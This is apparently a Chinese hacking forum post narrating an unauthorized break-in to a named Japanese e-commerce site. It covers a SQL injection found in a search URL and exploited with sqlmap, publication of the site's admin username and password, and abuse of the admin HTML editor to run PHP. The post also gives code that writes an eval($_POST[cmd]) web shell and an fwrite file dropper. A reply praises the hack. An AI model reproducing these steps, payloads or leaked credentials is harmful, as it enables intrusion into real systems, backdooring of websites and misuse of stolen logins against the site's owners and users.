无聊拿个日本站

admin

目標站:http://www.partsclub.jp/

首先:http://www.partsclub.jp/search/s ... scode=1328505750%27  存在注入

丟给sqlmap跑  得管理账號:admin  密码:ecbbadmin

http://www.partsclub.jp/admin/prog/

找到一个上传，不过不能利用  所以小编我翻啊翻

找到一个编辑网页的地方

https://www.partsclub.jp/admin/prog/html.php

我们添加一个php试试。

好吧只能用html  我试过1.php.html也不行

突然发现可以执行php代码。。。

不过如果shell很好拿我就不会发这篇文章了- -

使用帝国CMS拿shell语句

执行

1. <?fputs(fopen("x.php","w"),"<?eval($_POST[cmd]);?>")?>

复制代码

蛋疼了  没权限。。。

之后执行

1. <span style="color: rgb(96, 96, 96); font-family: 'Microsoft YaHei', Arial, 'Open Sans', SimSun, sans-serif; font-size: 20.8px; line-height: 37.44px; text-indent: 41.6px;"><?php</span>

复制代码

日狗  函数禁用。

后来到外国网站找方法  他们说用fwrite就可以写入了，我来试试看。

1. <?php
   
2. $fh = fopen("shell.php", "wb");
   
3. fwrite($fh, "<?phpinfo();?>");
   
4. fclose($fh);
   
5. ?>

复制代码

醉了，，我忘记没权限写入这个目录，加上物理路径即可。

成功写入。

这个可以有。。，

ERROR:

不错，为老大点个赞